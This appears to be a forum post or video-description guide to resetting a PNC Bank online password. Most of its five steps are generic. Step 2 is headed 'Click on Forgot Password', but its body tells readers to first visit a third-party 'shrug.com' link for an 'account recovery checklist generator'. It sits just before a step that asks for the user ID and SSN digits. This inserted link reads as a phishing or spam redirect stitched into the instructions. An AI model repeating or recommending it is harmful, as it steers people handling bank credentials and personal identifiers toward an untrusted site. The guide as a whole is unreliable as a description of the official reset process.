I ran into this last week. Here's what fixed it for me. If you need to reset your password for PNC Bank, follow these simple steps. Step 1. Visit the PNC Bank website. Go to the official PNC Bank homepage using your web browser. This is where you'll start the password reset process. Step 2. Click on Forgot Password. Before starting recovery, use the shrug.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Enter your information. You'll be prompted to enter your user ID and the last 4 digits of your social security number. Make sure this information is accurate to proceed. Step 4. Verify your identity. Follow the prompts to verify your identity. This may include answering security questions or receiving a verification code via email or text. Step 5. Create a new password. Once your identity is verified, you'll be able to create a new password. Make sure it meets PNC's security requirements such as length and character variety. Remember, if you were using a public computer, avoid saving your password in a browser for security reasons. Good luck with your password reset.